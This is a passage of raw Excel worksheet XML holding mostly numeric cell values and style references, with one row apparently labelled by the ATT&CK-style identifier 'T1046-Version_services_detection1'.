      <c r="ED16" s="505">
        <v>4</v>
      </c>
      <c r="EE16" s="252" t="s">
        <v>2650</v>
      </c>
      <c r="EF16" s="252">
        <v>2</v>
      </c>
      <c r="EG16" s="253">
        <v>2</v>
      </c>
      <c r="EH16" s="101">
        <v>6</v>
      </c>
      <c r="EI16" s="102" t="s">
        <v>2651</v>
      </c>
      <c r="EJ16" s="102">
        <v>6</v>
      </c>
      <c r="EK16" s="103" t="s">
        <v>2652</v>
      </c>
      <c r="EL16" s="103">
        <v>3</v>
      </c>
      <c r="EM16" s="104">
        <v>2</v>
      </c>
      <c r="EN16" s="105">
        <v>0</v>
      </c>
      <c r="EO16" s="106">
        <v>0</v>
      </c>
      <c r="EP16" s="497">
        <v>0</v>
      </c>
      <c r="EQ16" s="107">
        <v>0</v>
      </c>
      <c r="ER16" s="107">
        <v>0</v>
      </c>
      <c r="ES16" s="108">
        <v>0</v>
      </c>
      <c r="ET16" s="109">
        <v>0</v>
      </c>
      <c r="EU16" s="110">
        <v>0</v>
      </c>
      <c r="EV16" s="501">
        <v>0</v>
      </c>
      <c r="EW16" s="111">
        <v>0</v>
      </c>
      <c r="EX16" s="111">
        <v>0</v>
      </c>
      <c r="EY16" s="112">
        <v>0</v>
      </c>
      <c r="EZ16" s="113">
        <v>2</v>
      </c>
      <c r="FA16" s="114" t="s">
        <v>2645</v>
      </c>
      <c r="FB16" s="503">
        <v>2</v>
      </c>
      <c r="FC16" s="115" t="s">
        <v>2646</v>
      </c>
      <c r="FD16" s="115">
        <v>1</v>
      </c>
      <c r="FE16" s="116">
        <v>2</v>
      </c>
      <c r="FF16" s="101">
        <v>6</v>
      </c>
      <c r="FG16" s="102" t="s">
        <v>1797</v>
      </c>
      <c r="FH16" s="102">
        <v>2</v>
      </c>
      <c r="FI16" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ16" s="103">
        <v>1</v>
      </c>
      <c r="FK16" s="104">
        <v>2</v>
      </c>
      <c r="FL16" s="105">
        <v>0</v>
      </c>
      <c r="FM16" s="106">
        <v>0</v>
      </c>
      <c r="FN16" s="497">
        <v>0</v>
      </c>
      <c r="FO16" s="107">
        <v>0</v>
      </c>
      <c r="FP16" s="107">
        <v>0</v>
      </c>
      <c r="FQ16" s="108">
        <v>0</v>
      </c>
      <c r="FR16" s="109">
        <v>6</v>
      </c>
      <c r="FS16" s="110" t="s">
        <v>1797</v>
      </c>
      <c r="FT16" s="501">
        <v>2</v>
      </c>
      <c r="FU16" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FV16" s="111">
        <v>1</v>
      </c>
      <c r="FW16" s="112">
        <v>2</v>
      </c>
      <c r="FX16" s="113">
        <v>6</v>
      </c>
      <c r="FY16" s="114" t="s">
        <v>1797</v>
      </c>
      <c r="FZ16" s="503">
        <v>2</v>
      </c>
      <c r="GA16" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB16" s="115">
        <v>1</v>
      </c>
      <c r="GC16" s="116">
        <v>2</v>
      </c>
      <c r="GD16" s="250">
        <v>14</v>
      </c>
      <c r="GE16" s="251" t="s">
        <v>2653</v>
      </c>
      <c r="GF16" s="505">
        <v>2</v>
      </c>
      <c r="GG16" s="252" t="s">
        <v>1910</v>
      </c>
      <c r="GH16" s="252">
        <v>1</v>
      </c>
      <c r="GI16" s="253">
        <v>2</v>
      </c>
      <c r="GJ16" s="101">
        <v>20</v>
      </c>
      <c r="GK16" s="102" t="s">
        <v>2654</v>
      </c>
      <c r="GL16" s="102">
        <v>4</v>
      </c>
      <c r="GM16" s="103" t="s">
        <v>2655</v>
      </c>
      <c r="GN16" s="103">
        <v>2</v>
      </c>
      <c r="GO16" s="104">
        <v>2</v>
      </c>
      <c r="GP16" s="105">
        <v>0</v>
      </c>
      <c r="GQ16" s="106">
        <v>0</v>
      </c>
      <c r="GR16" s="497">
        <v>0</v>
      </c>
      <c r="GS16" s="107">
        <v>0</v>
      </c>
      <c r="GT16" s="107">
        <v>0</v>
      </c>
      <c r="GU16" s="108">
        <v>0</v>
      </c>
      <c r="GV16" s="109">
        <v>0</v>
      </c>
      <c r="GW16" s="110">
        <v>0</v>
      </c>
      <c r="GX16" s="501">
        <v>0</v>
      </c>
      <c r="GY16" s="111">
        <v>0</v>
      </c>
      <c r="GZ16" s="111">
        <v>0</v>
      </c>
      <c r="HA16" s="112">
        <v>0</v>
      </c>
      <c r="HB16" s="113">
        <v>6</v>
      </c>
      <c r="HC16" s="114" t="s">
        <v>1797</v>
      </c>
      <c r="HD16" s="503">
        <v>2</v>
      </c>
      <c r="HE16" s="115" t="s">
        <v>336</v>
      </c>
      <c r="HF16" s="115">
        <v>1</v>
      </c>
      <c r="HG16" s="116">
        <v>2</v>
      </c>
      <c r="HH16" s="101">
        <v>0</v>
      </c>
      <c r="HI16" s="102">
        <v>0</v>
      </c>
      <c r="HJ16" s="102">
        <v>0</v>
      </c>
      <c r="HK16" s="103">
        <v>0</v>
      </c>
      <c r="HL16" s="103">
        <v>0</v>
      </c>
      <c r="HM16" s="104">
        <v>0</v>
      </c>
      <c r="HN16" s="105">
        <v>2</v>
      </c>
      <c r="HO16" s="106" t="s">
        <v>2656</v>
      </c>
      <c r="HP16" s="497">
        <v>2</v>
      </c>
      <c r="HQ16" s="107" t="s">
        <v>2657</v>
      </c>
      <c r="HR16" s="107">
        <v>1</v>
      </c>
      <c r="HS16" s="108">
        <v>2</v>
      </c>
      <c r="HT16" s="109">
        <v>2</v>
      </c>
      <c r="HU16" s="110" t="s">
        <v>2656</v>
      </c>
      <c r="HV16" s="501">
        <v>2</v>
      </c>
      <c r="HW16" s="111" t="s">
        <v>2657</v>
      </c>
      <c r="HX16" s="111">
        <v>1</v>
      </c>
      <c r="HY16" s="112">
        <v>2</v>
      </c>
      <c r="HZ16" s="113">
        <v>0</v>
      </c>
      <c r="IA16" s="114">
        <v>0</v>
      </c>
      <c r="IB16" s="503">
        <v>0</v>
      </c>
      <c r="IC16" s="115">
        <v>0</v>
      </c>
      <c r="ID16" s="115">
        <v>0</v>
      </c>
      <c r="IE16" s="116">
        <v>0</v>
      </c>
      <c r="IF16" s="250">
        <v>2</v>
      </c>
      <c r="IG16" s="251" t="s">
        <v>2656</v>
      </c>
      <c r="IH16" s="505">
        <v>2</v>
      </c>
      <c r="II16" s="252" t="s">
        <v>2657</v>
      </c>
      <c r="IJ16" s="252">
        <v>1</v>
      </c>
      <c r="IK16" s="253">
        <v>2</v>
      </c>
      <c r="IL16" s="101">
        <v>2</v>
      </c>
      <c r="IM16" s="102" t="s">
        <v>2656</v>
      </c>
      <c r="IN16" s="102">
        <v>2</v>
      </c>
      <c r="IO16" s="103" t="s">
        <v>2657</v>
      </c>
      <c r="IP16" s="103">
        <v>1</v>
      </c>
      <c r="IQ16" s="104">
        <v>2</v>
      </c>
      <c r="IR16" s="105">
        <v>0</v>
      </c>
      <c r="IS16" s="106">
        <v>0</v>
      </c>
      <c r="IT16" s="497">
        <v>0</v>
      </c>
      <c r="IU16" s="107">
        <v>0</v>
      </c>
      <c r="IV16" s="107">
        <v>0</v>
      </c>
      <c r="IW16" s="108">
        <v>0</v>
      </c>
      <c r="IX16" s="109">
        <v>0</v>
      </c>
      <c r="IY16" s="110">
        <v>0</v>
      </c>
      <c r="IZ16" s="501">
        <v>0</v>
      </c>
      <c r="JA16" s="111">
        <v>0</v>
      </c>
      <c r="JB16" s="111">
        <v>0</v>
      </c>
      <c r="JC16" s="112">
        <v>0</v>
      </c>
      <c r="JD16" s="113">
        <v>2</v>
      </c>
      <c r="JE16" s="114" t="s">
        <v>2656</v>
      </c>
      <c r="JF16" s="503">
        <v>2</v>
      </c>
      <c r="JG16" s="115" t="s">
        <v>2657</v>
      </c>
      <c r="JH16" s="115">
        <v>1</v>
      </c>
      <c r="JI16" s="116">
        <v>2</v>
      </c>
      <c r="JJ16" s="101">
        <v>0</v>
      </c>
      <c r="JK16" s="102">
        <v>0</v>
      </c>
      <c r="JL16" s="102">
        <v>0</v>
      </c>
      <c r="JM16" s="103">
        <v>0</v>
      </c>
      <c r="JN16" s="103">
        <v>0</v>
      </c>
      <c r="JO16" s="104">
        <v>0</v>
      </c>
      <c r="JP16" s="105">
        <v>0</v>
      </c>
      <c r="JQ16" s="106">
        <v>0</v>
      </c>
      <c r="JR16" s="497">
        <v>0</v>
      </c>
      <c r="JS16" s="107">
        <v>0</v>
      </c>
      <c r="JT16" s="107">
        <v>0</v>
      </c>
      <c r="JU16" s="108">
        <v>0</v>
      </c>
      <c r="JV16" s="109">
        <v>0</v>
      </c>
      <c r="JW16" s="110">
        <v>0</v>
      </c>
      <c r="JX16" s="501">
        <v>0</v>
      </c>
      <c r="JY16" s="111">
        <v>0</v>
      </c>
      <c r="JZ16" s="111">
        <v>0</v>
      </c>
      <c r="KA16" s="112">
        <v>0</v>
      </c>
      <c r="KB16" s="113">
        <v>0</v>
      </c>
      <c r="KC16" s="114">
        <v>0</v>
      </c>
      <c r="KD16" s="503">
        <v>0</v>
      </c>
      <c r="KE16" s="115">
        <v>0</v>
      </c>
      <c r="KF16" s="115">
        <v>0</v>
      </c>
      <c r="KG16" s="116">
        <v>0</v>
      </c>
      <c r="KH16" s="250">
        <v>0</v>
      </c>
      <c r="KI16" s="251">
        <v>0</v>
      </c>
      <c r="KJ16" s="505">
        <v>0</v>
      </c>
      <c r="KK16" s="252">
        <v>0</v>
      </c>
      <c r="KL16" s="252">
        <v>0</v>
      </c>
      <c r="KM16" s="253">
        <v>0</v>
      </c>
      <c r="KN16" s="101">
        <v>0</v>
      </c>
      <c r="KO16" s="102">
        <v>0</v>
      </c>
      <c r="KP16" s="102">
        <v>0</v>
      </c>
      <c r="KQ16" s="103">
        <v>0</v>
      </c>
      <c r="KR16" s="103">
        <v>0</v>
      </c>
      <c r="KS16" s="104">
        <v>0</v>
      </c>
      <c r="KT16" s="105">
        <v>0</v>
      </c>
      <c r="KU16" s="106">
        <v>0</v>
      </c>
      <c r="KV16" s="497">
        <v>0</v>
      </c>
      <c r="KW16" s="107">
        <v>0</v>
      </c>
      <c r="KX16" s="107">
        <v>0</v>
      </c>
      <c r="KY16" s="108">
        <v>0</v>
      </c>
      <c r="KZ16" s="109">
        <v>0</v>
      </c>
      <c r="LA16" s="110">
        <v>0</v>
      </c>
      <c r="LB16" s="501">
        <v>0</v>
      </c>
      <c r="LC16" s="111">
        <v>0</v>
      </c>
      <c r="LD16" s="111">
        <v>0</v>
      </c>
      <c r="LE16" s="112">
        <v>0</v>
      </c>
      <c r="LF16" s="113">
        <v>0</v>
      </c>
      <c r="LG16" s="114">
        <v>0</v>
      </c>
      <c r="LH16" s="503">
        <v>0</v>
      </c>
      <c r="LI16" s="115">
        <v>0</v>
      </c>
      <c r="LJ16" s="115">
        <v>0</v>
      </c>
      <c r="LK16" s="116">
        <v>0</v>
      </c>
      <c r="LL16" s="117">
        <v>6</v>
      </c>
      <c r="LM16" s="507">
        <v>2</v>
      </c>
      <c r="LN16" s="119">
        <v>1</v>
      </c>
      <c r="LO16" s="119">
        <v>0</v>
      </c>
      <c r="LP16" s="119">
        <v>2</v>
      </c>
      <c r="LQ16" s="119">
        <v>2</v>
      </c>
      <c r="LR16" s="119">
        <v>0</v>
      </c>
      <c r="LS16" s="119">
        <v>2</v>
      </c>
      <c r="LT16" s="382"/>
      <c r="LU16" s="117">
        <v>0</v>
      </c>
      <c r="LV16" s="118">
        <v>0</v>
      </c>
      <c r="LW16" s="507">
        <v>0</v>
      </c>
      <c r="LX16" s="119">
        <v>0</v>
      </c>
      <c r="LY16" s="119">
        <v>0</v>
      </c>
      <c r="LZ16" s="119">
        <v>0</v>
      </c>
      <c r="MA16" s="117">
        <v>0</v>
      </c>
      <c r="MB16" s="118">
        <v>0</v>
      </c>
      <c r="MC16" s="507">
        <v>0</v>
      </c>
      <c r="MD16" s="119">
        <v>0</v>
      </c>
      <c r="ME16" s="119">
        <v>0</v>
      </c>
      <c r="MF16" s="119">
        <v>0</v>
      </c>
      <c r="MG16" s="117">
        <v>0</v>
      </c>
      <c r="MH16" s="118">
        <v>0</v>
      </c>
      <c r="MI16" s="507">
        <v>0</v>
      </c>
      <c r="MJ16" s="119">
        <v>0</v>
      </c>
      <c r="MK16" s="119">
        <v>0</v>
      </c>
      <c r="ML16" s="119">
        <v>0</v>
      </c>
      <c r="MM16" s="117">
        <v>0</v>
      </c>
      <c r="MN16" s="118">
        <v>0</v>
      </c>
      <c r="MO16" s="507">
        <v>0</v>
      </c>
      <c r="MP16" s="119">
        <v>0</v>
      </c>
      <c r="MQ16" s="119">
        <v>0</v>
      </c>
      <c r="MR16" s="119">
        <v>0</v>
      </c>
      <c r="MS16" s="117">
        <v>6</v>
      </c>
      <c r="MT16" s="118" t="s">
        <v>4168</v>
      </c>
      <c r="MU16" s="507">
        <v>2</v>
      </c>
      <c r="MV16" s="119" t="s">
        <v>2658</v>
      </c>
      <c r="MW16" s="119">
        <v>1</v>
      </c>
      <c r="MX16" s="119">
        <v>2</v>
      </c>
      <c r="MY16" s="117">
        <v>0</v>
      </c>
      <c r="MZ16" s="118">
        <v>0</v>
      </c>
      <c r="NA16" s="507">
        <v>0</v>
      </c>
      <c r="NB16" s="119">
        <v>0</v>
      </c>
      <c r="NC16" s="119">
        <v>0</v>
      </c>
      <c r="ND16" s="119">
        <v>0</v>
      </c>
      <c r="NE16" s="117">
        <v>0</v>
      </c>
      <c r="NF16" s="118">
        <v>0</v>
      </c>
      <c r="NG16" s="507">
        <v>0</v>
      </c>
      <c r="NH16" s="119">
        <v>0</v>
      </c>
      <c r="NI16" s="119">
        <v>0</v>
      </c>
      <c r="NJ16" s="119">
        <v>0</v>
      </c>
      <c r="NK16" s="117">
        <v>0</v>
      </c>
      <c r="NL16" s="118">
        <v>0</v>
      </c>
      <c r="NM16" s="507">
        <v>0</v>
      </c>
      <c r="NN16" s="119">
        <v>0</v>
      </c>
      <c r="NO16" s="119">
        <v>0</v>
      </c>
      <c r="NP16" s="119">
        <v>0</v>
      </c>
      <c r="NQ16" s="117">
        <v>0</v>
      </c>
      <c r="NR16" s="118">
        <v>0</v>
      </c>
      <c r="NS16" s="507">
        <v>0</v>
      </c>
      <c r="NT16" s="119">
        <v>0</v>
      </c>
      <c r="NU16" s="119">
        <v>0</v>
      </c>
      <c r="NV16" s="119">
        <v>0</v>
      </c>
      <c r="NW16" s="117">
        <v>0</v>
      </c>
      <c r="NX16" s="118">
        <v>0</v>
      </c>
      <c r="NY16" s="507">
        <v>0</v>
      </c>
      <c r="NZ16" s="119">
        <v>0</v>
      </c>
      <c r="OA16" s="119">
        <v>0</v>
      </c>
      <c r="OB16" s="119">
        <v>0</v>
      </c>
      <c r="OC16" s="120">
        <v>1</v>
      </c>
      <c r="OD16" s="120">
        <v>1</v>
      </c>
      <c r="OE16" s="120">
        <v>1</v>
      </c>
      <c r="OF16" s="121">
        <v>1</v>
      </c>
      <c r="OG16" s="120">
        <v>1</v>
      </c>
      <c r="OH16" s="120">
        <v>1</v>
      </c>
      <c r="OI16" s="120">
        <v>1</v>
      </c>
      <c r="OJ16" s="120">
        <v>1</v>
      </c>
      <c r="OK16" s="383"/>
      <c r="OL16" s="120">
        <v>0</v>
      </c>
      <c r="OM16" s="120">
        <v>0</v>
      </c>
      <c r="ON16" s="120">
        <v>0</v>
      </c>
      <c r="OO16" s="189"/>
      <c r="OP16" s="189">
        <v>0</v>
      </c>
      <c r="OQ16" s="464">
        <v>0</v>
      </c>
      <c r="OR16" s="120">
        <v>0</v>
      </c>
      <c r="OS16" s="120">
        <v>0</v>
      </c>
      <c r="OT16" s="120">
        <v>0</v>
      </c>
      <c r="OU16" s="189"/>
      <c r="OV16" s="189">
        <v>0</v>
      </c>
      <c r="OW16" s="464">
        <v>0</v>
      </c>
      <c r="OX16" s="120">
        <v>0</v>
      </c>
      <c r="OY16" s="120">
        <v>0</v>
      </c>
      <c r="OZ16" s="120">
        <v>0</v>
      </c>
      <c r="PA16" s="189"/>
      <c r="PB16" s="189">
        <v>0</v>
      </c>
      <c r="PC16" s="464">
        <v>0</v>
      </c>
      <c r="PD16" s="120">
        <v>0</v>
      </c>
      <c r="PE16" s="120">
        <v>0</v>
      </c>
      <c r="PF16" s="120">
        <v>0</v>
      </c>
      <c r="PG16" s="189"/>
      <c r="PH16" s="189">
        <v>0</v>
      </c>
      <c r="PI16" s="464">
        <v>0</v>
      </c>
      <c r="PJ16" s="120">
        <v>1</v>
      </c>
      <c r="PK16" s="120">
        <v>1</v>
      </c>
      <c r="PL16" s="120">
        <v>1</v>
      </c>
      <c r="PM16" s="189" t="s">
        <v>2659</v>
      </c>
      <c r="PN16" s="189">
        <v>1</v>
      </c>
      <c r="PO16" s="464">
        <v>1</v>
      </c>
      <c r="PP16" s="120">
        <v>1</v>
      </c>
      <c r="PQ16" s="120">
        <v>1</v>
      </c>
      <c r="PR16" s="120">
        <v>1</v>
      </c>
      <c r="PS16" s="189" t="s">
        <v>2660</v>
      </c>
      <c r="PT16" s="189">
        <v>1</v>
      </c>
      <c r="PU16" s="464">
        <v>1</v>
      </c>
      <c r="PV16" s="120">
        <v>0</v>
      </c>
      <c r="PW16" s="120">
        <v>0</v>
      </c>
      <c r="PX16" s="120">
        <v>0</v>
      </c>
      <c r="PY16" s="189"/>
      <c r="PZ16" s="189">
        <v>0</v>
      </c>
      <c r="QA16" s="464">
        <v>0</v>
      </c>
      <c r="QB16" s="120">
        <v>0</v>
      </c>
      <c r="QC16" s="120">
        <v>0</v>
      </c>
      <c r="QD16" s="120">
        <v>0</v>
      </c>
      <c r="QE16" s="189"/>
      <c r="QF16" s="189">
        <v>0</v>
      </c>
      <c r="QG16" s="464">
        <v>0</v>
      </c>
      <c r="QH16" s="120">
        <v>0</v>
      </c>
      <c r="QI16" s="120">
        <v>0</v>
      </c>
      <c r="QJ16" s="120">
        <v>0</v>
      </c>
      <c r="QK16" s="189"/>
      <c r="QL16" s="189">
        <v>0</v>
      </c>
      <c r="QM16" s="464">
        <v>0</v>
      </c>
      <c r="QN16" s="120">
        <v>0</v>
      </c>
      <c r="QO16" s="120">
        <v>0</v>
      </c>
      <c r="QP16" s="120">
        <v>0</v>
      </c>
      <c r="QQ16" s="189"/>
      <c r="QR16" s="189">
        <v>0</v>
      </c>
      <c r="QS16" s="464">
        <v>0</v>
      </c>
      <c r="QT16" s="184"/>
      <c r="QU16" s="184"/>
      <c r="QV16" s="184"/>
      <c r="QW16" s="184"/>
      <c r="QX16" s="184"/>
      <c r="QY16" s="184"/>
      <c r="QZ16" s="184"/>
      <c r="RA16" s="184"/>
      <c r="RB16" s="184"/>
      <c r="RC16" s="184"/>
      <c r="RD16" s="184"/>
      <c r="RE16" s="184"/>
      <c r="RF16" s="184"/>
      <c r="RG16" s="184"/>
      <c r="RH16" s="184"/>
      <c r="RI16" s="184"/>
      <c r="RJ16" s="184"/>
      <c r="RK16" s="184"/>
      <c r="RL16" s="184"/>
      <c r="RM16" s="184"/>
      <c r="RN16" s="184"/>
      <c r="RO16" s="184"/>
      <c r="RP16" s="184"/>
      <c r="RQ16" s="184"/>
      <c r="RR16" s="184"/>
      <c r="RS16" s="184"/>
      <c r="RT16" s="184"/>
      <c r="RU16" s="184"/>
      <c r="RV16" s="184"/>
      <c r="RW16" s="184"/>
      <c r="RX16" s="184"/>
      <c r="RY16" s="184"/>
      <c r="RZ16" s="184"/>
      <c r="SA16" s="184"/>
      <c r="SB16" s="184"/>
      <c r="SC16" s="184"/>
      <c r="SD16" s="184"/>
      <c r="SE16" s="184"/>
      <c r="SF16" s="184"/>
      <c r="SG16" s="184"/>
      <c r="SH16" s="184"/>
      <c r="SI16" s="184"/>
      <c r="SJ16" s="184"/>
      <c r="SK16" s="184"/>
      <c r="SL16" s="184"/>
      <c r="SM16" s="184"/>
      <c r="SN16" s="184"/>
      <c r="SO16" s="184"/>
      <c r="SP16" s="184"/>
      <c r="SQ16" s="184"/>
      <c r="SR16" s="184"/>
      <c r="SS16" s="184"/>
      <c r="ST16" s="184"/>
      <c r="SU16" s="184"/>
      <c r="SV16" s="184"/>
      <c r="SW16" s="184"/>
      <c r="SX16" s="184"/>
      <c r="SY16" s="184"/>
      <c r="SZ16" s="184"/>
      <c r="TA16" s="184"/>
      <c r="TB16" s="184"/>
      <c r="TC16" s="184"/>
      <c r="TD16" s="184"/>
      <c r="TE16" s="184"/>
      <c r="TF16" s="184"/>
      <c r="TG16" s="184"/>
      <c r="TH16" s="184"/>
      <c r="TI16" s="184"/>
      <c r="TJ16" s="184"/>
      <c r="TK16" s="184"/>
      <c r="TL16" s="184"/>
      <c r="TM16" s="184"/>
      <c r="TN16" s="184"/>
      <c r="TO16" s="184"/>
      <c r="TP16" s="184"/>
      <c r="TQ16" s="184"/>
      <c r="TR16" s="184"/>
      <c r="TS16" s="184"/>
      <c r="TT16" s="184"/>
      <c r="TU16" s="184"/>
      <c r="TV16" s="184"/>
      <c r="TW16" s="184"/>
      <c r="TX16" s="184"/>
      <c r="TY16" s="184"/>
      <c r="TZ16" s="184"/>
      <c r="UA16" s="184"/>
      <c r="UB16" s="184"/>
      <c r="UC16" s="184"/>
      <c r="UD16" s="184"/>
      <c r="UE16" s="184"/>
      <c r="UF16" s="184"/>
      <c r="UG16" s="184"/>
      <c r="UH16" s="184"/>
      <c r="UI16" s="184"/>
      <c r="UJ16" s="184"/>
      <c r="UK16" s="184"/>
      <c r="UL16" s="184"/>
      <c r="UM16" s="184"/>
      <c r="UN16" s="184"/>
      <c r="UO16" s="184"/>
      <c r="UP16" s="184"/>
      <c r="UQ16" s="184"/>
      <c r="UR16" s="184"/>
      <c r="US16" s="184"/>
      <c r="UT16" s="184"/>
      <c r="UU16" s="184"/>
      <c r="UV16" s="184"/>
      <c r="UW16" s="184"/>
      <c r="UX16" s="184"/>
      <c r="UY16" s="184"/>
      <c r="UZ16" s="184"/>
      <c r="VA16" s="184"/>
      <c r="VB16" s="184"/>
      <c r="VC16" s="184"/>
      <c r="VD16" s="184"/>
      <c r="VE16" s="184"/>
      <c r="VF16" s="184"/>
      <c r="VG16" s="184"/>
      <c r="VH16" s="184"/>
      <c r="VI16" s="184"/>
      <c r="VJ16" s="184"/>
      <c r="VK16" s="184"/>
      <c r="VL16" s="184"/>
      <c r="VM16" s="184"/>
      <c r="VN16" s="184"/>
      <c r="VO16" s="184"/>
      <c r="VP16" s="184"/>
      <c r="VQ16" s="184"/>
      <c r="VR16" s="184"/>
      <c r="VS16" s="184"/>
      <c r="VT16" s="184"/>
      <c r="VU16" s="184"/>
      <c r="VV16" s="184"/>
      <c r="VW16" s="184"/>
      <c r="VX16" s="184"/>
      <c r="VY16" s="184"/>
    </row>
    <row r="17" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A17" s="82" t="s">
        <v>17</v>
      </c>
      <c r="B17" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C17" s="83" t="s">
        <v>315</v>
      </c>
      <c r="D17" s="83" t="s">
        <v>37</v>
      </c>
      <c r="E17" s="83">
        <f t="shared" si="2"/>
        <v>13</v>
      </c>
      <c r="F17" s="83" t="s">
        <v>38</v>
      </c>
      <c r="G17" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H17" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I17" s="81" t="s">
        <v>889</v>
      </c>
      <c r="J17" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K17" s="81" t="s">
        <v>890</v>
      </c>
      <c r="L17" s="81" t="s">
        <v>891</v>
      </c>
      <c r="M17" s="378" t="s">
        <v>191</v>
      </c>
      <c r="N17" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O17" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P17" s="91"/>
      <c r="Q17" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R17" s="92" t="s">
        <v>892</v>
      </c>
      <c r="S17" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T17" s="92" t="s">
        <v>893</v>
      </c>
      <c r="U17" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V17" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W17" s="96" t="s">
        <v>894</v>
      </c>
      <c r="X17" s="97" t="s">
        <v>895</v>
      </c>
      <c r="Y17" s="83" t="s">
        <v>896</v>
      </c>
      <c r="Z17" s="98" t="s">
        <v>897</v>
      </c>
      <c r="AA17" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB17" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC17" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD17" s="83"/>
      <c r="AE17" s="83"/>
      <c r="AF17" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG17" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH17" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI17" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ17" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK17" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL17" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM17" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN17" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO17" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP17" s="385" t="str">
        <f>M17&amp;"-frag"</f>
        <v>T1046-Version_services_detection1-frag</v>
      </c>
      <c r="AQ17" s="358">
        <v>160</v>
      </c>
      <c r="AR17" s="100"/>
      <c r="AS17" s="100">
        <v>159</v>
      </c>
      <c r="AT17" s="100">
        <v>0</v>
      </c>
      <c r="AU17" s="100">
        <v>159</v>
      </c>
      <c r="AV17" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW17" s="100">
        <v>6293</v>
      </c>
      <c r="AX17" s="100">
        <v>6293</v>
      </c>
      <c r="AY17" s="100">
        <v>0</v>
      </c>
      <c r="AZ17" s="100">
        <v>6293</v>
      </c>
      <c r="BA17" s="381" t="s">
        <v>4871</v>
      </c>
      <c r="BB17" s="101">
        <v>270</v>
      </c>
      <c r="BC17" s="102" t="s">
        <v>2661</v>
      </c>
      <c r="BD17" s="102">
        <v>105</v>
      </c>
      <c r="BE17" s="103" t="s">
        <v>2662</v>
      </c>
      <c r="BF17" s="103">
        <v>12</v>
      </c>
      <c r="BG17" s="104">
        <v>85</v>
      </c>
      <c r="BH17" s="105">
        <v>837</v>
      </c>
      <c r="BI17" s="106" t="s">
        <v>2663</v>
      </c>
      <c r="BJ17" s="497">
        <v>284</v>
      </c>
      <c r="BK17" s="107" t="s">
        <v>2664</v>
      </c>
      <c r="BL17" s="107">
        <v>110</v>
      </c>
      <c r="BM17" s="108">
        <v>101</v>
      </c>
      <c r="BN17" s="109">
        <v>1107</v>
      </c>
      <c r="BO17" s="110" t="s">
        <v>1988</v>
      </c>
      <c r="BP17" s="501">
        <v>389</v>
      </c>
      <c r="BQ17" s="111" t="s">
        <v>1989</v>
      </c>
      <c r="BR17" s="111">
        <v>122</v>
      </c>
      <c r="BS17" s="112">
        <v>121</v>
      </c>
      <c r="BT17" s="113">
        <v>15703</v>
      </c>
      <c r="BU17" s="114" t="s">
        <v>2665</v>
      </c>
      <c r="BV17" s="503">
        <v>1240</v>
      </c>
      <c r="BW17" s="115" t="s">
        <v>2666</v>
      </c>
      <c r="BX17" s="115">
        <v>438</v>
      </c>
      <c r="BY17" s="116">
        <v>156</v>
      </c>
      <c r="BZ17" s="250">
        <v>4135</v>
      </c>
      <c r="CA17" s="251" t="s">
        <v>2667</v>
      </c>
      <c r="CB17" s="505">
        <v>787</v>
      </c>
      <c r="CC17" s="252" t="s">
        <v>2668</v>
      </c>
      <c r="CD17" s="252">
        <v>316</v>
      </c>
      <c r="CE17" s="253">
        <v>123</v>
      </c>
      <c r="CF17" s="101">
        <v>19838</v>
      </c>
      <c r="CG17" s="102" t="s">
        <v>2669</v>
      </c>
      <c r="CH17" s="102">
        <v>2027</v>
      </c>
      <c r="CI17" s="103" t="s">
        <v>2670</v>
      </c>
      <c r="CJ17" s="103">
        <v>754</v>
      </c>
      <c r="CK17" s="104">
        <v>156</v>
      </c>
      <c r="CL17" s="105">
        <v>0</v>
      </c>
      <c r="CM17" s="106">
        <v>0</v>
      </c>
      <c r="CN17" s="497">
        <v>0</v>
      </c>
      <c r="CO17" s="107">
        <v>0</v>
      </c>
      <c r="CP17" s="107">
        <v>0</v>
      </c>
      <c r="CQ17" s="108">
        <v>0</v>
      </c>
      <c r="CR17" s="109">
        <v>1806</v>
      </c>
      <c r="CS17" s="110" t="s">
        <v>2671</v>
      </c>
      <c r="CT17" s="501">
        <v>620</v>
      </c>
      <c r="CU17" s="111" t="s">
        <v>2672</v>
      </c>
      <c r="CV17" s="111">
        <v>337</v>
      </c>
      <c r="CW17" s="112">
        <v>122</v>
      </c>
      <c r="CX17" s="113">
        <v>2913</v>
      </c>
      <c r="CY17" s="114" t="s">
        <v>2133</v>
      </c>
      <c r="CZ17" s="503">
        <v>1009</v>
      </c>
      <c r="DA17" s="115" t="s">
        <v>2134</v>
      </c>
      <c r="DB17" s="115">
        <v>459</v>
      </c>
      <c r="DC17" s="116">
        <v>133</v>
      </c>
      <c r="DD17" s="101">
        <v>79</v>
      </c>
      <c r="DE17" s="102" t="s">
        <v>2673</v>
      </c>
      <c r="DF17" s="102">
        <v>30</v>
      </c>
      <c r="DG17" s="103" t="s">
        <v>2674</v>
      </c>
      <c r="DH17" s="103">
        <v>4</v>
      </c>
      <c r="DI17" s="104">
        <v>30</v>
      </c>
      <c r="DJ17" s="105">
        <v>454</v>
      </c>
      <c r="DK17" s="106" t="s">
        <v>2675</v>
      </c>
      <c r="DL17" s="497">
